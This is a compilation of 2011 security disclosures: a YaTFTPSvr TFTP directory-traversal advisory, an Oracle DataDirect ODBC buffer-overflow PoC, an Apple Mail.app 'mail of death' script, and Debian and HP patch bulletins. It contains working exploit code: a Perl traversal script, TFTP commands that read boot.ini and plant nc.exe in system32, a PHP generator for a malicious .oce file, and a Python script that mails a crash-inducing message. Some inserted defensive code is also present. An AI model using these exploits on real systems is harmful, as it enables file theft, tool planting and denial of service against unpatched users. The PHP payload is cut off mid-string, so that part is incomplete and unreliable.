YaTFTPSvr TFTP Server Directory Traversal Vulnerability
Title: YaTFTPSvr TFTP Server Directory Traversal Vulnerability
Software: YaTFTPSvr TFTP Server
Software Version: 1.0.1.200
Vendor: http://sites.google.com/site/zhaojieding2/
Vulnerability Published: 2011-07-11
Vulnerability Update Time:
Status:
Impact: Medium

Bug Description:

YaTFTPSvr TFTP Server does not properly sanitise filenames containing directory traversal sequences that are received from a TFTP client.

Proof Of Concept:

After installing YaTFTPSvr on the C drive, and doing some preparation:

#!/usr/bin/perl -w
$|=1;
$target_ip=shift || die "usage: $0 \$target_ip\n";

# candidate traversal depths, one tmp.txt write attempt each
@directory_traversal=(
    '..\tmp.txt',
    '..\..\tmp.txt',
    '..\..\..\tmp.txt',
    '..\..\..\..\tmp.txt',
    '..\..\..\..\..\tmp.txt',
    '..\..\..\..\..\..\tmp.txt',
    '..\..\..\..\..\..\..\tmp.txt'
);

# local marker file to upload
open(TMP, ">tmp.txt");
print TMP "tmp";
close(TMP);

foreach $dt_content (@directory_traversal){
    $dt_it=`tftp.exe $target_ip put tmp.txt $dt_content`;
    print "command : tftp.exe $target_ip put tmp.txt $dt_content\n";
    print "$dt_it";
    if($dt_it=~m/^Transferred successfully/){
        print "Directory Traversal PAYLOAD is $dt_content.\n";
        print "Press [ENTER] Button to continue...\n";
        <STDIN>;   # wait for the operator (the read was lost in the archive copy)
    }
    sleep(3);
}
print "Finish!\n";
exit(0);

Exploit:

#get sensitive file
c:\windows\system32>tftp [VICTIM_IP] get ../../boot.ini boot.ini

#put malware
c:\windows\system32>tftp [VICTIM_IP] put nc.exe ../../WINDOWS/system32/nc.exe

Credits:

This vulnerability was discovered by demonalex(at)163(dot)com
Pentester/Researcher
Dark2S Security Team/PolyU.HK
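The server-side filename check that YaTFTPSvr lacks, added here as an example (not YaTFTPSvr's code): a TFTP filename from an RRQ or WRQ is accepted only when it resolves strictly below the server root, treating both '/' and '\' as separators and rejecting any '..' component, drive letter or absolute path outright rather than normalising it away. The root directory and the sample requests are constructed.

```python
import posixpath

# Constructed root for the demonstration; in the advisory's setup the real
# root is wherever YaTFTPSvr was installed (the C drive).
TFTP_ROOT = "/srv/tftp"


class TraversalRejected(ValueError):
    """Raised when a client-supplied filename must not be served."""


def resolve_tftp_filename(root, requested):
    """Map a client-supplied TFTP filename onto a path strictly below root.

    The filename in a TFTP request is attacker-controlled. YaTFTPSvr handed it
    to the filesystem unchanged, so '..\\..\\boot.ini' walked out of the root.
    This check treats '/' and '\\' alike (Windows accepts either), refuses
    absolute paths and drive letters, refuses any '..' component instead of
    collapsing it, refuses NUL bytes (which truncate names in C code), and
    finally re-checks that the normalised path still starts with the root.
    """
    if not requested or "\x00" in requested:
        raise TraversalRejected("empty or NUL-containing filename")
    unified = requested.replace("\\", "/")
    if unified.startswith("/") or (len(unified) > 1 and unified[1] == ":"):
        raise TraversalRejected("absolute path or drive letter: %r" % requested)
    parts = [p for p in unified.split("/") if p not in ("", ".")]
    if not parts:
        raise TraversalRejected("no file component: %r" % requested)
    if any(p == ".." for p in parts):
        raise TraversalRejected("parent-directory component: %r" % requested)
    root = posixpath.normpath(root)
    full = posixpath.normpath(posixpath.join(root, *parts))
    # Belt and braces: normalisation must not have moved us outside the root.
    if not full.startswith(root + "/"):
        raise TraversalRejected("escapes root after normalisation: %r" % requested)
    return full


def is_safe_tftp_filename(root, requested):
    """Boolean form, convenient for logging rejected requests at the server."""
    try:
        resolve_tftp_filename(root, requested)
        return True
    except TraversalRejected:
        return False


if __name__ == "__main__":
    # Constructed requests: the advisory's payload shapes plus legitimate names.
    for name in ("tmp.txt", "firmware/boot.bin", "..\\..\\boot.ini",
                 "../../WINDOWS/system32/nc.exe", "C:\\boot.ini", "/etc/passwd"):
        verdict = "OK" if is_safe_tftp_filename(TFTP_ROOT, name) else "REJECTED"
        print("%-32s %s" % (name, verdict))
```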
Oracle DataDirect ODBC Drivers HOST Attribute arsqls24.dll Stack Based Buffer Overflow PoC (*.oce)
<?php
/*
http://retrogod.altervista.org/9sg_oracle_datadirect.htm
http://www.exploit-db.com/exploits/18007/

This poc will create a suntzu.oce file which should work against Hyperion Interactive Reporting Studio, which is delivered with Oracle Hyperion Suite. When clicked a login box appears; on clicking OK an error message also appears, then another error, then... boom!

description for .oce : Interactive Reporting database connection file
file association: "C:\Oracle\Middleware3\EPMSystem11R1\products\biplus\\bin\\brioqry.exe" "%1"

crash dump, eip and seh overwritten, unicode expanded, I suppose one should be able to deal with it :

(208.152c): Access violation - code c005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=008b ebx= ecx=0e752eb8 edx=0f49 esi=0e6b3d60 edi=0012a338
eip=00410043 esp=0012a2d8 ebp=0012a2ec iopl=0 nv up ei ng nz na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs= efl=00010286
brioqry+0x10043:
00410043 0152ff add dword ptr [edx-1],edx ds:0023:0f48=
0:000> g
(208.152c): Access violation - code c005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=008b ebx= ecx=00410041 edx=7c8285f6 esi= edi=
eip=00410043 esp=00129f10 ebp=00129f30 iopl=0 nv up ei ng nz na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs= efl=00010286
brioqry+0x10043:
00410043 0152ff add dword ptr [edx-1],edx ds:0023:7c8285f5=244c8b00
*/

// read a little-endian dword, add the length of $buff, and re-pack it
function _x($x){
    global $buff;
    list($x) = array_values(unpack('V', $x));
    $x = $x + strlen($buff);
    $x = pack('V',$x);
    return $x;
}

$buff = "mydatabase.com".
        str_repeat("\x20",16). //cosmetics, no ... inside the login box
        str_repeat("\x41",4000);

//$dsn="DRIVER=DataDirect 6.0 Greenplum Wire Protocol;HOST=;IP=127.0.0.1;PORT=9;DB=DB2DATA;UID=sa;PWD=null;";
//$dsn="DRIVER=DataDirect 6.0 MySQL Wire Protocol;HOST=;IP=127.0.0.1;PORT=9;DB=DATA;UID=sa;PWD=null";
$dsn="DRIVER=DataDirect 6.0 PostgreSQL Wire Protocol;HOST=;UID=system;PWD=X;";
while (!(strlen($dsn)==166)){ //fill the gap
    $dsn.="\x20";
}
$dsn=str_replace("HOST=;","HOST=".$buff.";",$dsn);

$dump=
"#BRIF\x20BIN001".
"\x00\x00\x00\x00".
_x("\x7b\x07\x00\x00"). //header length, increase counter
"\x37\x00\x00\x00". //path length
"D:\\Documents\x20and\x20Settings\\Admin\\Desktop\\Predefinito.oce".
"\x01\x00\x01\x00".
"\x00\x00\x07\x00".
"\x00\x00\x0a\x00".
"\x00\x00".
_x("\xa6\x00\x00\x00"). //dsn length
$dsn.
"\x00\x00\x00\x00".
"\x00\x00\x00\x00".
"\x04\x00\x00\x00".
"True".
"\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x01\x00\x01\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00@\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00@\x00\x00\x00\x04\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\r\x00\x00\x00".
"ColItem.Table".
"\x01\x00".
"\x00\x00\x04\x00\x00\x00\x12\x00\x00\x00".
"ColItem.TableAlias".
"\x01\x00\x00\x00\x10\x00".
"\x00\x00\r\x00\x00\x00".
"ColItem.Owner".
"\x01\x00\x00\x00\x1c\x00\x00\x00\x0c\x00\x00".
"\x00".
"ColItem.Type".
"\x01\x00\x00\x00(\x00\x00\x00\x03\x00\x00\x00\x06\x00\x00\x00".
"Source".
"\x01\x00\x00\x00\x05\x00\x00\x004\x00\x00\x00\x05\x00\x00\x00".
"Where".
"\x01".
"\x00\x00\x00\x05\x00\x00\x008\x00\x00\x00\x07\x00\x00\x00".
"OrderBy".
"\x01\x00".
"\x00\x00\x05\x00\x00\x00<\x00\x00\x00|\x00\x00\x00\x04\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x09\x00\x00\x00\x0c\x00\x00\x00ColItem.Name\x01\x00\x00\x00".
"\x04\x00\x00\x00\x10\x00\x00\x00".
"ColItem.ColAlias".
"\x01\x00\x00\x00\x10\x00\x00\x00".
"\x0e\x00\x00\x00".
"ColItem.ColNum".
"\x01\x00\x00\x00\x1c\x00\x00\x00\x0f\x00\x00\x00".
"ColItem.ColType".
"\x01\x00\x00\x00(\x00\x00\x00\x10\x00\x00\x00".
"ColItem.NumBytes".
"\x01\x00\x00\x004\x00".
"\x00\x00\x0e\x00\x00\x00".
"ColItem.Places".
"\x01\x00\x00\x00@\x00\x00\x00\x0e\x00\x00".
"\x00".
"ColItem.Digits".
"\x01\x00\x00\x00L\x00\x00\x00\r\x00\x00\x00".
"ColItem.Nulls".
"\x01\x00\x00\x00X\x00".
"\x00\x00\x12\x00\x00\x00".
"ColItem.NativeType".
"\x01
Apple's Mail.app mail of death
OVERVIEW

Mail.app mail client is vulnerable to a DoS by sending a crafted email.

VENDOR

Apple Inc.
Vendor contacted: 25 July 2011
Vendor reply: 20 September 2011.
Vendor's actions: Details confidential.

VULNERABILITY DESCRIPTION

Send an email with > 2023 MIME attachments to the victim client. Upon parsing the attachments, the mail client crashes.

Impact: DoS
Type: Remote, by sending a crafted email. Buffer overflow on parsing MIME attachments.
Result: Mail.app crashes upon parsing the attachments, and produces a crash report. The client leaves the email on the mail server, so it crashes again on the same mail at next startup.
Difficulty: I can teach it to my mother.

VULNERABLE VERSIONS

- All versions up to Mac OS X 10.7.2 on Intel. (Mail.app version 5.1)
- At least the mail client on IOS 4.2.x, 4.3.3. (IOS 5.x untested)
- Not vulnerable: Leopard on PPC

SOLUTION

...

MITIGATION

Some spam cleaners are capable of limiting the number of attachments.

CREDITS

shebang42

PROOF OF CONCEPT CODE

#!/usr/bin/env python
# Mail of death for Apple's Mail.app
#
# Tested & vulnerable: Leopard/Intel, Snow Leopard, Lion (up to 10.7.2), IOS 4.2.x, 4.3.3
# Tested != vulnerable: Leopard/PPC
# Create mail with n_attach MIME attachments
# Version 1.0; shebang42

import smtplib

n_attach = 2040                 # ~2024 is sufficient
relay = 'your.mta.goes.here'
mailfrom = 'mail_of_de...@example.com'
mailto = mailfrom
subject = 'PoC Apple Mail.app mail of death'
date = 'October 29, 2011 10:00:00 GMT'

def craft_mail():
    # top-level headers: a multipart/mixed body delimited by "delim"
    header = 'From: %s\nTo: %s\nSubject: %s\nDate: %s\nContent-Type: multipart/mixed ; boundary="delim"\n\n' % (mailfrom, mailto, subject, date)
    # one real text part ...
    body = '--delim\nContent-Type: text/plain\nContent-Disposition: inline\n\nHello World\nBye Mail.app\n\n\n'
    # ... followed by n_attach minimal parts, each just a Content-Disposition header
    attach = '--delim\nContent-Disposition: inline\n\n' * n_attach
    ### Another, slightly longer option to crash Mail.app (same bug)
    # attach = '--delim\nContent-Type: text/plain\nContent-Disposition: attachment; filename=\n\ncontent\n' * n_attach
    return header + body + attach

def send_mail(mail):
    server = smtplib.SMTP(relay)
    server.sendmail(mailfrom, mailto, mail)
    server.quit()

mail = craft_mail()
#print mail
send_mail(mail)
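A gateway-side check for the mitigation named above (limiting the number of attachments), added as an example that is not part of the original advisory: it counts leaf MIME parts with Python's standard email parser and flags messages over an assumed limit. The sample message is constructed with the same layout as the PoC's craft_mail(), including its bare parts and missing closing boundary.

```python
import email

# Assumed gateway policy value. The advisory says roughly 2024 parts crash
# Mail.app, so a limit far below that leaves margin without hurting real mail.
MAX_MIME_PARTS = 100


def count_mime_parts(raw_message):
    """Return the number of leaf (non-multipart) MIME parts in a raw message.

    The standard-library parser tolerates the PoC's bare parts (a lone
    Content-Disposition header, no body) and the missing closing boundary,
    so the count reflects what a client would actually have to render.
    """
    msg = email.message_from_string(raw_message)
    return sum(1 for part in msg.walk() if not part.is_multipart())


def exceeds_part_limit(raw_message, limit=MAX_MIME_PARTS):
    """True when the message should be quarantined or stripped before delivery."""
    return count_mime_parts(raw_message) > limit


def build_sample_mail(n_attach):
    """Constructed message mirroring craft_mail(): one text part, then
    n_attach empty inline parts, with no closing boundary line."""
    header = ('From: sender@example.com\nTo: recipient@example.com\n'
              'Subject: constructed sample\n'
              'Content-Type: multipart/mixed ; boundary="delim"\n\n')
    body = ('--delim\nContent-Type: text/plain\nContent-Disposition: inline\n\n'
            'Hello World\n\n')
    attach = '--delim\nContent-Disposition: inline\n\n' * n_attach
    return header + body + attach


if __name__ == "__main__":
    for n in (3, 2040):
        raw = build_sample_mail(n)
        print("%4d bare parts -> %4d leaf parts, over limit: %s"
              % (n, count_mime_parts(raw), exceeds_part_limit(raw)))
```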
[SECURITY] [DSA 2333-1] phpldapadmin security update
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- ------------------------------------------------------------------------
Debian Security Advisory DSA-2333-1                   secur...@debian.org
http://www.debian.org/security/                       Jonathan Wiltshire
Oct 31st, 2011                         http://www.debian.org/security/faq
- ------------------------------------------------------------------------

Package        : phpldapadmin
Vulnerability  : several
Problem type   : remote
Debian-specific: no
Debian bug     : 646754
CVE IDs        : CVE-2011-4075 CVE-2011-4074

Two vulnerabilities have been discovered in phpldapadmin, a web based interface for administering LDAP servers. The Common Vulnerabilities and Exposures project identifies the following problems:

CVE-2011-4074

Input appended to the URL in cmd.php (when "cmd" is set to "_debug") is not properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in the context of an affected site.

CVE-2011-4075

Input passed to the "orderby" parameter in cmd.php (when "cmd" is set to "query_engine", "query" is set to "none", and "search" is set to e.g. "1") is not properly sanitised in lib/functions.php before being used in a "create_function()" function call. This can be exploited to inject and execute arbitrary PHP code.

For the oldstable distribution (lenny), these problems have been fixed in version 1.1.0.5-6+lenny2.

For the stable distribution (squeeze), these problems have been fixed in version 1.2.0.5-2+squeeze1.

For the testing distribution (wheezy), these problems will be fixed soon.

For the unstable distribution (sid), these problems have been fixed in version 1.2.0.5-2.1.

We recommend that you upgrade your phpldapadmin packages.

Further information about Debian Security Advisories, how to apply these updates to your system and frequently asked questions can be found at: http://www.debian.org/security/

Mailing list: debian-security-annou...@lists.debian.org

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.11 (GNU/Linux)

iEYEARECAAYFAk6tQ0EACgkQHYflSXNkfP+uCQCeMmNGTEsYJURFndG0Vj7LAicH
qhMAnili/N36OYURQYkY/Bbd873EtlLm
=8Zwg
-----END PGP SIGNATURE-----
[SECURITY] [DSA 2332-1] python-django security update
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- ------------------------------------------------------------------------
Debian Security Advisory DSA-2332-1                   secur...@debian.org
http://www.debian.org/security/                           Thijs Kinkhorst
October 29, 2011                       http://www.debian.org/security/faq
- ------------------------------------------------------------------------

Package        : python-django
Vulnerability  : several issues
Problem type   : remote
Debian-specific: no
CVE ID         : CVE-2011-4136 CVE-2011-4137 CVE-2011-4138 CVE-2011-4139 CVE-2011-4140
Debian Bug     : 641405

Paul McMillan, Mozilla and the Django core team discovered several vulnerabilities in Django, a Python web framework:

CVE-2011-4136

When using memory-based sessions and caching, Django sessions are stored directly in the root namespace of the cache. When user data is stored in the same cache, a remote user may take over a session.

CVE-2011-4137, CVE-2011-4138

Django's field type URLField by default checks supplied URLs by issuing a request to them, which doesn't time out. A Denial of Service is possible by supplying specially prepared URLs that keep the connection open indefinitely or fill the Django server's memory.

CVE-2011-4139

Django used X-Forwarded-Host headers to construct full URLs. This header may not contain trusted input and could be used to poison the cache.

CVE-2011-4140

The CSRF protection mechanism in Django does not properly handle web-server configurations supporting arbitrary HTTP Host headers, which allows remote attackers to trigger unauthenticated forged requests.

For the oldstable distribution (lenny), this problem has been fixed in version 1.0.2-1+lenny3.

For the stable distribution (squeeze), this problem has been fixed in version 1.2.3-3+squeeze2.

For the testing (wheezy) and unstable distribution (sid), this problem has been fixed in version 1.3.1-1.

We recommend that you upgrade your python-django packages.

Further information about Debian Security Advisories, how to apply these updates to your system and frequently asked questions can be found at: http://www.debian.org/security/

Mailing list: debian-security-annou...@lists.debian.org

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.10 (GNU/Linux)

iQEcBAEBAgAGBQJOq5QOAAoJEOxfUAG2iX573FoH/3Ld4NEmMPQlRW9JmB3AAdsU
BjvYcbABkPRbQRJeIN9VAEF5+O0qxNjl7FjEfDXAjJ3iunxje4saddw2D/JLmH6J
I5Qmj2hKOXrnOnG6rPJHZDhc33023fVBCLqOekOIfukkDz7ShWwKglmzTHbzhJLr
cibWsHZc+7l583d3Q8pPR5CfVmFUGq9d+SO0E3Tp+r5iBOhT7KlHt+txTQ9Ir3UQ
u2cIo3LjEsyVjcsYTnfLSUANYnMLZqdROm/2GkSJlvrJFY2yac9T9eWAqLM4TrX3
eGjbNSWu6Zknd0o3VBlPuqVTxBDz3Wje0k9Rg7XcO/54+stIKo1VTTZ+3+No0bU=
=xhY3
-----END PGP SIGNATURE-----
[security bulletin] HPSBUX02707 SSRT100626 rev.2 - HP-UX Apache Web Server, Remote Denial of Service (DoS)
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

SUPPORT COMMUNICATION - SECURITY BULLETIN

Document ID: c03025215
Version: 2

HPSBUX02707 SSRT100626 rev.2 - HP-UX Apache Web Server, Remote Denial of Service (DoS)

NOTICE: The information in this Security Bulletin should be acted upon as soon as possible.

Release Date: 2011-09-26
Last Updated: 2011-10-26

Potential Security Impact: Remote Denial of Service (DoS)

Source: Hewlett-Packard Company, HP Software Security Response Team

VULNERABILITY SUMMARY
A potential security vulnerability has been identified with HP-UX Apache Web Server. This vulnerability could be exploited remotely to create a Denial of Service (DoS).

References: CVE-2011-0419, CVE-2011-3192, CVE-2011-3348

SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.
HP-UX B.11.23, B.11.31 running HP-UX Apache Web Server Suite v3.18 containing Apache v2.2.15.08 or earlier

BACKGROUND

CVSS 2.0 Base Metrics
===========================================================
  Reference              Base Vector             Base Score
CVE-2011-0419    (AV:N/AC:M/Au:N/C:N/I:N/A:P)       4.3
CVE-2011-3192    (AV:N/AC:L/Au:N/C:N/I:N/A:C)       7.8
CVE-2011-3348    (AV:N/AC:M/Au:N/C:N/I:N/A:P)       4.3
===========================================================
Information on CVSS is documented in HP Customer Notice: HPSN-2008-002

RESOLUTION

HP has provided the following software updates to resolve this vulnerability. The updates are available for download from the following location:
https://h20392.www2.hp.com/portal/swdepot/try.do?productNumber=HPUXWSATW319

HP-UX Web Server Suite (WSS) v3.19 containing Apache v2.2.15.09

HP-UX 11i Releases / Apache Depot name
B.11.23, B.11.31 (32-bit) / HPUXWS22ATW-B319-32.depot
B.11.23, B.11.31 (64-bit) / HPUXWS22ATW-B319-64.depot

MANUAL ACTIONS: Yes - Update
Install HP-UX Web Server Suite v3.19 containing v2.2.15.09 or subsequent.

PRODUCT SPECIFIC INFORMATION

HP-UX Software Assistant: HP-UX Software Assistant is an enhanced application that replaces HP-UX Security Patch Check. It analyzes all Security Bulletins issued by HP and lists recommended actions that may apply to a specific HP-UX system. It can also download patches and create a depot automatically. For more information see https://www.hp.com/go/swa

The following text is for use by the HP-UX Software Assistant.

AFFECTED VERSIONS

HP-UX Web Server Suite v3.19
HP-UX B.11.23
HP-UX B.11.31
==================
hpuxws22APCH32.APACHE
hpuxws22APCH32.APACHE2
hpuxws22APCH32.AUTH_LDAP
hpuxws22APCH32.AUTH_LDAP2
hpuxws22APCH32.MOD_JK
hpuxws22APCH32.MOD_JK2
hpuxws22APCH32.MOD_PERL
hpuxws22APCH32.MOD_PERL2
hpuxws22APCH32.PHP
hpuxws22APCH32.PHP2
hpuxws22APCH32.WEBPROXY
hpuxws22APCH32.WEBPROXY2
hpuxws22APACHE.APACHE
hpuxws22APACHE.APACHE2
hpuxws22APACHE.AUTH_LDAP
hpuxws22APACHE.AUTH_LDAP2
hpuxws22APACHE.MOD_JK
hpuxws22APACHE.MOD_JK2
hpuxws22APACHE.MOD_PERL
hpuxws22APACHE.MOD_PERL2
hpuxws22APACHE.PHP
hpuxws22APACHE.PHP2
hpuxws22APACHE.WEBPROXY
hpuxws22APACHE.WEBPROXY2
action: install revision B.2.2.15.09 or subsequent

END AFFECTED VERSIONS

HISTORY
Version:1 (rev.1) - 26 September 2011 Initial release
Version:2 (rev.2) - 26 October 2011 Final depots available

Third Party Security Patches: Third party security patches that are to be installed on systems running HP software products should be applied in accordance with the customer's patch management policy.

Support: For further information, contact normal HP Services support channel.

Report: To report a potential security vulnerability with any HP supported product, send Email to: security-al...@hp.com

Subscribe: To initiate a subscription to receive future HP Security Bulletin alerts via Email: http://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins

Security Bulletin List: A list of HP Security Bulletins, updated periodically, is contained in HP Security Notice HPSN-2011-001: https://h20566.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_na-c02964430

3C = 3COM
3P = 3rd Party Software
GN = HP General Software
HF = HP Hardware and Firmware
MP = MPE/iX
MU = Multi-Platform Software
NS = NonStop Servers
OV = OpenVMS
PI = Printing and Imaging
PV = ProCurve
ST = Storage Software
TU = Tru64 UNIX
UX = HP-UX

Copyright 2011 Hewlett-Packard Development Company, L.P.
Hewlett-Packard Company shall not be liable for technical or editorial errors or omissions contained herein. The information provided is provided "as is" without warranty of any kind. To the extent permitted by law, neither HP nor its affiliates, subcontractors or suppliers will be liable for incidental, special or consequential damages including downtime cost; lost profits; damages relating to the procurement of substitute products or services; or damages for loss of data, or software restoration. The information in this document is subject to change without
[security bulletin] HPSBUX02702 SSRT100606 rev.5 - HP-UX Apache Web Server, Remote Denial of Service (DoS)
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

SUPPORT COMMUNICATION - SECURITY BULLETIN

Document ID: c02997184
Version: 5

HPSBUX02702 SSRT100606 rev.5 - HP-UX Apache Web Server, Remote Denial of Service (DoS)

NOTICE: The information in this Security Bulletin should be acted upon as soon as possible.

Release Date: 2011-09-08
Last Updated: 2011-10-26

Potential Security Impact: Remote Denial of Service (DoS)

Source: Hewlett-Packard Company, HP Software Security Response Team

VULNERABILITY SUMMARY
Potential security vulnerabilities have been identified with HP-UX Apache Web Server. These vulnerabilities could be exploited remotely to create a Denial of Service (DoS).

References: CVE-2011-3192, CVE-2011-0419

SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.
HP-UX B.11.23, B.11.31 running HP-UX Apache Web Server Suite v3.18 containing Apache v2.2.15.08 or earlier
HP-UX B.11.11 running HP-UX Apache Web Server Suite v2.33 containing Apache v2.0.64.01 or earlier

BACKGROUND

CVSS 2.0 Base Metrics
===========================================================
  Reference              Base Vector             Base Score
CVE-2011-3192    (AV:N/AC:L/Au:N/C:N/I:N/A:C)       7.8
CVE-2011-0419    (AV:N/AC:M/Au:N/C:N/I:N/A:P)       4.3
===========================================================
Information on CVSS is documented in HP Customer Notice: HPSN-2008-002

RESOLUTION

HP has provided the following software updates to resolve these vulnerabilities.

HP-UX Web Server Suite (WSS) v3.19 containing Apache v2.2.15.09

The WSS v3.19 update is available for download from the following location:
https://h20392.www2.hp.com/portal/swdepot/try.do?productNumber=HPUXWSATW319

HP-UX 11i Releases / Apache Depot name
B.11.23 & B.11.31 (32-bit) / HPUXWS22ATW-B319-32.depot
B.11.23 & B.11.31 (64-bit) / HPUXWS22ATW-B319-64.depot

HP-UX Web Server Suite (WSS) v2.34 containing Apache v2.0.64.02

The WSS v2.34 update is available for download from the following location:
https://h20392.www2.hp.com/portal/swdepot/displayProductInfo.do?productNumber=HPUXWSATW234

HP-UX 11i Release / Apache Depot name
B.11.11 / HPUXWSATW-B234-.depot
B.11.23 (32 & 64-bit) / No longer supported. Upgrade to WSS v3.19
B.11.31 (32 & 64-bit) / No longer supported. Upgrade to WSS v3.19

MANUAL ACTIONS: Yes - Update
For B.11.23 and B.11.31 install HP-UX Web Server Suite v3.19 or subsequent.
For B.11.11 install HP-UX Web Server Suite v2.34 or subsequent.

PRODUCT SPECIFIC INFORMATION

HP-UX Software Assistant: HP-UX Software Assistant is an enhanced application that replaces HP-UX Security Patch Check. It analyzes all Security Bulletins issued by HP and lists recommended actions that may apply to a specific HP-UX system. It can also download patches and create a depot automatically. For more information see https://www.hp.com/go/swa

The following text is for use by the HP-UX Software Assistant.

AFFECTED VERSIONS

HP-UX Web Server Suite v3.19
HP-UX B.11.23
HP-UX B.11.31
==================
hpuxws22APCH32.APACHE
hpuxws22APCH32.APACHE2
hpuxws22APCH32.AUTH_LDAP
hpuxws22APCH32.AUTH_LDAP2
hpuxws22APCH32.MOD_JK
hpuxws22APCH32.MOD_JK2
hpuxws22APCH32.MOD_PERL
hpuxws22APCH32.MOD_PERL2
hpuxws22APCH32.PHP
hpuxws22APCH32.PHP2
hpuxws22APCH32.WEBPROXY
hpuxws22APCH32.WEBPROXY2
hpuxws22APACHE.APACHE
hpuxws22APACHE.APACHE2
hpuxws22APACHE.AUTH_LDAP
hpuxws22APACHE.AUTH_LDAP2
hpuxws22APACHE.MOD_JK
hpuxws22APACHE.MOD_JK2
hpuxws22APACHE.MOD_PERL
hpuxws22APACHE.MOD_PERL2
hpuxws22APACHE.PHP
hpuxws22APACHE.PHP2
hpuxws22APACHE.WEBPROXY
hpuxws22APACHE.WEBPROXY2
action: install revision B.2.2.15.09 or subsequent

HP-UX Web Server Suite v2.34
HP-UX B.11.11
==================
hpuxwsAPACHE.APACHE
hpuxwsAPACHE.APACHE2
hpuxwsAPACHE.AUTH_LDAP
hpuxwsAPACHE.AUTH_LDAP2
hpuxwsAPACHE.MOD_JK
hpuxwsAPACHE.MOD_JK2
hpuxwsAPACHE.MOD_PERL
hpuxwsAPACHE.MOD_PERL2
hpuxwsAPACHE.PHP
hpuxwsAPACHE.PHP2
hpuxwsAPACHE.WEBPROXY
action: install revision B.2.0.64.02 or subsequent

END AFFECTED VERSIONS

HISTORY
Version:1 (rev.1) - 8 September 2011 Initial release
Version:2 (rev.2) - 8 September 2011 Updated affectivity, recommendations, typos
Version:3 (rev.3) - 22 September 2011 New source for depots
Version:4 (rev.4) - 23 September 2011 Apache WSS 2.33 depot for B.11.11 available
Version:5 (rev.5) - 26 October 2011 Final depots available

Third Party Security Patches: Third party security patches that are to be installed on systems running HP software products should be applied in accordance with the customer's patch management policy.

Support: For further information, contact normal HP Services support channel.

Report: To report a potential security vulnerability with any HP supported product, send Email to: security-al...@hp.com

Subscribe: To initiate a subscription to receive future HP Security Bulletin alerts via Email: http://h41183.www4.hp.com/signup_alerts.php?jum